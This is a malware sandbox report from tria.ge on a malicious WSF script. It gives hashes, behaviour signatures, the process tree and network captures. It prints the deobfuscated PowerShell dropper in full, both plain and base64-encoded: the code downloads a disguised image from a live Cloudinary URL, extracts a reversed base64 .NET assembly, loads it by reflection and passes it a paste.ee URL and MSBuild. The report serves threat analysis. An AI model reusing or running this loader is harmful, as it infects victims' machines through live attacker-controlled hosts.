Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

4e176fd538...17.wsf

windows7-x64

10

4e176fd538...17.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04/12/2024, 02:31 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17.wsf

  • Size

    3KB

  • MD5

    2351b140cfa13f0cf05f93b471edd1f6

  • SHA1

    aab24f356405a117ce7df0016b131872fb1b2f16

  • SHA256

    4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17

  • SHA512

    bb7e68724ba4e4169e90b0ff3d6379dda43c0d01bf1e26b91211a124833317a4741bb6c5f0c3e97bcc79f8d01460bb09b6cf963c2f39890b7063ddd1b74f0085

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$originador = "aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JGFudGl2aXZpc3NlY2Npb25pc3RhID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JHBsdW1hY2hvID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29udm9jYXIgPSAkcGx1bWFjaG8uRG93bmxvYWREYXRhKCRhbnRpdml2aXNzZWNjaW9uaXN0YSk7JGFjY2VsZXJhdHJpeiA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjb252b2Nhcik7JGNoaW5jaGFycmF2ZWxobyA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskb2JjZWNhciA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRhc2NhciA9ICRhY2NlbGVyYXRyaXouSW5kZXhPZigkY2hpbmNoYXJyYXZlbGhvKTskbW9jYW1iZWlybyA9ICRhY2NlbGVyYXRyaXouSW5kZXhPZigkb2JjZWNhcik7JHRhc2NhciAtZ2UgMCAtYW5kICRtb2NhbWJlaXJvIC1ndCAkdGFzY2FyOyR0YXNjYXIgKz0gJGNoaW5jaGFycmF2ZWxoby5MZW5ndGg7JGFuZmljYXJwbyA9ICRtb2NhbWJlaXJvIC0gJHRhc2NhcjskYWNhc3VzbyA9ICRhY2NlbGVyYXRyaXouU3Vic3RyaW5nKCR0YXNjYXIsICRhbmZpY2FycG8pOyRlc3R1ZmFkZWlyYSA9IC1qb2luICgkYWNhc3Vzby5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkYWNhc3Vzby5MZW5ndGgpXTskcGlhc3NhYmEgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRlc3R1ZmFkZWlyYSk7JG1lZHVsYW50ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHBpYXNzYWJhKTskZ3JhZmljYW1lbnRlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGdyYWZpY2FtZW50ZS5JbnZva2UoJG51bGwsIEAoJzAvZUdwdU4vci9lZS5ldHNhcC8vOnNwdHRoJywgJ2JyYW5kbycsICdicmFuZG8nLCAnYnJhbmRvJywgJ01TQnVpbGQnLCAnYnJhbmRvJywgJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJzEnLCdicmFuZG8nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07"
3
$alegorista = "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antivivisseccionista = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$plumacho = New-Object System.Net.WebClient;$convocar = $plumacho.DownloadData($antivivisseccionista);$acceleratriz = [System.Text.Encoding]::UTF8.GetString($convocar);$chincharravelho = '<<BASE64_START>>';$obcecar = '<<BASE64_END>>';$tascar = $acceleratriz.IndexOf($chincharravelho);$mocambeiro = $acceleratriz.IndexOf($obcecar);$tascar -ge 0 -and $mocambeiro -gt $tascar;$tascar += $chincharravelho.Length;$anficarpo = $mocambeiro - $tascar;$acasuso = $acceleratriz.Substring($tascar, $anficarpo);$estufadeira = -join ($acasuso.ToCharArray() | ForEach-Object { $_ })[-1..-($acasuso.Length)];$piassaba = [System.Convert]::FromBase64String($estufadeira);$medulante = [System.Reflection.Assembly]::Load($piassaba);$graficamente = [dnlib.IO.Home].GetMethod('VAI');$graficamente.Invoke($null, @('0/eGpuN/r/ee.etsap//:sptth', 'brando', 'brando', 'brando', 'MSBuild', 'brando', 'brando','brando','brando','brando','brando','brando','1','brando'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
4
invoke-expression "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antivivisseccionista = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$plumacho = New-Object System.Net.WebClient;$convocar = $plumacho.DownloadData($antivivisseccionista);$acceleratriz = [System.Text.Encoding]::UTF8.GetString($convocar);$chincharravelho = '<<BASE64_START>>';$obcecar = '<<BASE64_END>>';$tascar = $acceleratriz.IndexOf($chincharravelho);$mocambeiro = $acceleratriz.IndexOf($obcecar);$tascar -ge 0 -and $mocambeiro -gt $tascar;$tascar += $chincharravelho.Length;$anficarpo = $mocambeiro - $tascar;$acasuso = $acceleratriz.Substring($tascar, $anficarpo);$estufadeira = -join ($acasuso.ToCharArray() | ForEach-Object { $_ })[-1..-($acasuso.Length)];$piassaba = [System.Convert]::FromBase64String($estufadeira);$medulante = [System.Reflection.Assembly]::Load($piassaba);$graficamente = [dnlib.IO.Home].GetMethod('VAI');$graficamente.Invoke($null, @('0/eGpuN/r/ee.etsap//:sptth', 'brando', 'brando', 'brando', 'MSBuild', 'brando', 'brando','brando','brando','brando','brando','brando','1','brando'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
5
6
# powershell snippet 1
7
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
8
[void]$psversiontable.psversion
9
} else {
10
write-output "PowerShell version Not available"
11
}
12
if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) {
13
[void]$psversiontable.psversion
14
} else {
15
write-output "PowerShell version Not available"
16
}
17
$antivivisseccionista = "https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg "
18
$plumacho = new-object system.net.webclient
19
$convocar = $plumacho.downloaddata("https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ")
20
$acceleratriz = ([system.text.encoding]::ascii).getstring($convocar)
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4e176fd538ca3aade9d71291f18cbe73022c88dd19e29fba250a6d0a9137be17.wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $originador = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JGFudGl2aXZpc3NlY2Npb25pc3RhID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JHBsdW1hY2hvID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29udm9jYXIgPSAkcGx1bWFjaG8uRG93bmxvYWREYXRhKCRhbnRpdml2aXNzZWNjaW9uaXN0YSk7JGFjY2VsZXJhdHJpeiA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjb252b2Nhcik7JGNoaW5jaGFycmF2ZWxobyA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskb2JjZWNhciA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRhc2NhciA9ICRhY2NlbGVyYXRyaXouSW5kZXhPZigkY2hpbmNoYXJyYXZlbGhvKTskbW9jYW1iZWlybyA9ICRhY2NlbGVyYXRyaXouSW5kZXhPZigkb2JjZWNhcik7JHRhc2NhciAtZ2UgMCAtYW5kICRtb2NhbWJlaXJvIC1ndCAkdGFzY2FyOyR0YXNjYXIgKz0gJGNoaW5jaGFycmF2ZWxoby5MZW5ndGg7JGFuZmljYXJwbyA9ICRtb2NhbWJlaXJvIC0gJHRhc2NhcjskYWNhc3VzbyA9ICRhY2NlbGVyYXRyaXouU3Vic3RyaW5nKCR0YXNjYXIsICRhbmZpY2FycG8pOyRlc3R1ZmFkZWlyYSA9IC1qb2luICgkYWNhc3Vzby5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkYWNhc3Vzby5MZW5ndGgpXTskcGlhc3NhYmEgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRlc3R1ZmFkZWlyYSk7JG1lZHVsYW50ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHBpYXNzYWJhKTskZ3JhZmljYW1lbnRlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGdyYWZpY2FtZW50ZS5JbnZva2UoJG51bGwsIEAoJzAvZUdwdU4vci9lZS5ldHNhcC8vOnNwdHRoJywgJ2JyYW5kbycsICdicmFuZG8nLCAnYnJhbmRvJywgJ01TQnVpbGQnLCAnYnJhbmRvJywgJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJ2JyYW5kbycsJzEnLCdicmFuZG8nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$alegorista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($originador));Invoke-Expression $alegorista
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352

Network

  • flag-us
    DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • flag-us
    GET
    http://paste.ee/d/81FCf
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/81FCf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 04 Dec 2024 02:31:24 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/81FCf
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4j3UkgAEwXIMvFvM6ubgz8psIRpNCRTpo2HAXijNMGZQkR9LTf2PSomHvNGkvF9Ff3xT%2FrX1jN9T%2FF9XQaRw0HHzJbeh3EOL5FnknnFxFngVHVrSHvpjNMqAhw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ec861476cb063ff-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=27518&min_rtt=27518&rtt_var=13759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    GET
    https://paste.ee/d/81FCf
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/81FCf HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Wed, 04 Dec 2024 02:31:24 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2rvIrW5vWkYjYu6h6a3lORMW8ybm%2FjiKAU%2F9QHLzjLW0uw21%2BcSHfMVCR0Tam6reXprctg3Xt3PXb7O4tMCU4ftlgMCXUuqOLuk6fDNHofeJRM12RcIG0wJWw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ec8614a28026412-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=31198&min_rtt=26190&rtt_var=14908&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=459&delivery_rate=115276&cwnd=253&unsent_bytes=0&cid=c9b75079b782d998&ts=250&x=0"
  • flag-us
    DNS
    res.cloudinary.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    res.cloudinary.com
    IN A
    Response
    res.cloudinary.com
    IN CNAME
    ion.cloudinary.com.edgekey.net
    ion.cloudinary.com.edgekey.net
    IN CNAME
    e1315.dsca.akamaiedge.net
    e1315.dsca.akamaiedge.net
    IN A
    2.18.108.33
  • flag-gb
    GET
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    powershell.exe
    Remote address:
    2.18.108.33:443
    Request
    GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: image/jpeg
    Content-Length: 2230233
    ETag: "7b9a6708dc7c92995f443d0b41dbc8d0"
    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
    Date: Wed, 04 Dec 2024 02:31:29 GMT
    Connection: keep-alive
    Cache-Control: public, no-transform, immutable, max-age=2592000
    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
    Access-Control-Expose-Headers: Content-Length,Content-Disposition,Content-Range,Etag,Server-Timing,Vary,X-Cld-Error,X-Robots-Tag,X-Content-Type-Options
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Timing-Allow-Origin: *
    Server: Cloudinary
    Strict-Transport-Security: max-age=604800
    X-Content-Type-Options: nosniff
    Server-Timing: cld-akam;dur=6;start=2024-12-04T02:31:29.042Z;desc=hit,rtt;dur=31,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
  • 172.67.187.200:80
    http://paste.ee/d/81FCf
    http
    WScript.exe
    403 B
     1.2kB
     5
    4

    HTTP Request

    GET http://paste.ee/d/81FCf

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/81FCf
    tls, http
    WScript.exe
    2.7kB
     88.7kB
     49
    83

    HTTP Request

    GET https://paste.ee/d/81FCf

    HTTP Response

    200
  • 2.18.108.33:443
    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
    tls, http
    powershell.exe
    54.7kB
     2.3MB
     1047
    1664

    HTTP Request

    GET https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

    HTTP Response

    200
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
     86 B
     1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    res.cloudinary.com
    dns
    powershell.exe
    64 B
     160 B
     1
    1

    DNS Request

    res.cloudinary.com

    DNS Response

    2.18.108.33

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabF681.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarF6B3.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • memory/2352-44-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-45-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2352-8-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-9-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2352-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2352-4-0x000007FEF55AE000-0x000007FEF55AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2352-7-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-46-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-47-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-48-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-49-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-51-0x000000001AF00000-0x000000001B058000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/2352-52-0x000007FEF52F0000-0x000007FEF5C8D000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.